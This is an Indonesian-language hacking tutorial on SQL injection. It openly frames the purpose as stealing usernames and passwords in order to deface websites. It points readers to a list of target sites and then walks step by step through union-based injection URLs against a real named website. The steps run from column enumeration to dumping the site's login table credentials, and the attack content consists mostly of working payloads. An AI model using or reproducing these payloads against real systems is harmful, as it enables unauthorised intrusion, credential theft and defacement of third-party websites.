SQL Injection

SQL Injection adalah teknik di mana hacker memasukkan kode SQL ke Forum web untuk mendapatkan Informasi Sensitif seperti ( User Name, Password ) untuk mengakses situs dan Deface itu.

1. Cari target website di http://sqli20162016.blogspot.co.id/

2. Pilih salah satu web nya

3. Kemudian beri kutip di sebelah url aggar bisa kita pastikan bahwa web yang kita tuju dapat di eksekusi.

4. Lalu kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. Menggunakan perintah : order by 1-- hingga seterusnya hingga menampilkan jika terjadi error pada halaman web nya. 

5. Kemudian sekarang kita akan mencari angka tabel yang bisa di gunakan untuk perintah-perintah selanjutnya. Menggunakan perintah union select.

http://staywellayurveda.com/treatment_read.php?id=-24 union select1,2,3,4--

6. Kemudian kita ekstrak apa saja yang ada di angka 2 dengan cara mengetikan:

http://staywellayurveda.com/treatment_read.php?id=-24 union select 1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

7. Karena sudah berhasil login kemudian kita ekstrak login untuk mengetahui apa yang ada dalam login dengan cara mengetikan:

http://staywellayurveda.com/treatment_read.php?id=-24 union select 1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x6C6F67696E --

PS: Kata 'login' kita konversi ke hexa

8. Kemudian kita coba ekstrak login dan pswd nya dengan cara mengetikan:

http://staywellayurveda.com/treatment_read.php?id=-24 union select 1,group_concat(uname,0x3a,pword),3,4+from+login--

Sumber : hizkiarioo25.blogspot.com alifarike21.blogspot.com